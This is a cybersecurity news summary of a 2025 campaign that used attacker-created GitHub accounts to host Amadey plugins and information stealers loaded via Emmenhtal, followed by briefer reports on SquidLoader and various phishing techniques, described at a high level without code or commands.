Cybersecurity researchers have uncovered a concerning trend where threat actors are leveraging legitimate public GitHub repositories to host and distribute malicious payloads, bypassing traditional web filtering and exploiting the platform’s trusted nature. This campaign, observed in April 2025, heavily utilizes the Amadey malware, which functions as a downloader for various custom payloads. These payloads, including prominent information stealers like Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer, are discreetly stored on GitHub accounts created by the attackers, making detection more challenging. The use of fake GitHub accounts and the “malware-as-a-service” model highlight a persistent and evolving threat landscape.
The attack chain for these campaigns often begins with a malware loader named Emmenhtal (also known as PEAKLIGHT).
This loader is responsible for delivering Amadey, which then fetches additional malicious components from the compromised GitHub repositories. Interestingly, tactical similarities have been noted between this April 2025 campaign and a February 2025 email phishing campaign that also employed Emmenhtal, but for distributing SmokeLoader. While both Emmenhtal and Amadey serve as downloaders for secondary payloads, Amadey distinguishes itself with its ability to collect system information and its extensibility through DLL plugins, enabling advanced functionalities like credential theft and screenshot capture.
Cisco Talos’s investigation into the April 2025 campaign specifically identified three GitHub accounts—Legendary99999, DFfe9ewf, and Milidmdds—as being used to host Amadey plugins and other malicious scripts. These accounts have since been taken down. Analysis revealed that some JavaScript files within these repositories were identical to those used in the earlier SmokeLoader campaign, with the primary difference being the final payloads delivered. Furthermore, a Python script found in the repositories suggests an evolution of Emmenhtal, incorporating a PowerShell command to download Amadey directly from a hard-coded IP address, indicating an attempt to further streamline the malicious delivery process.
Beyond the GitHub-centric Amadey campaigns, the cybersecurity community has also detailed other sophisticated phishing operations. Trellix, for instance, uncovered a campaign propagating SquidLoader, a formidable malware loader equipped with advanced anti-analysis and anti-sandbox techniques, targeting financial institutions in Hong Kong, Singapore, and Australia. SquidLoader’s primary objective is to deploy a Cobalt Strike beacon for remote access and control, posing a significant threat due to its evasive capabilities and low detection rates. These diverse campaigns underscore a broader trend of highly evasive and adaptive attack methodologies.
The current threat landscape is further characterized by a wide array of social engineering tactics. These include financially motivated groups like UNC5952 leveraging invoice-themed emails to deliver remote access software like ConnectWise ScreenConnect, and attacks employing tax-related or U.S. Social Security Administration themes for credential harvesting. The prevalence of phishing kits, such as Logokit and custom Python Flask-based kits, along with the increasing use of QR codes and cloaking-as-a-service offerings like Hoax Tech, highlights the attackers’ ingenuity in bypassing security measures. The adoption of password-protected archive attachments in emails also enables threat actors to circumvent secure email gateways, further emphasizing the need for robust and multi-layered cybersecurity defenses.
Reference: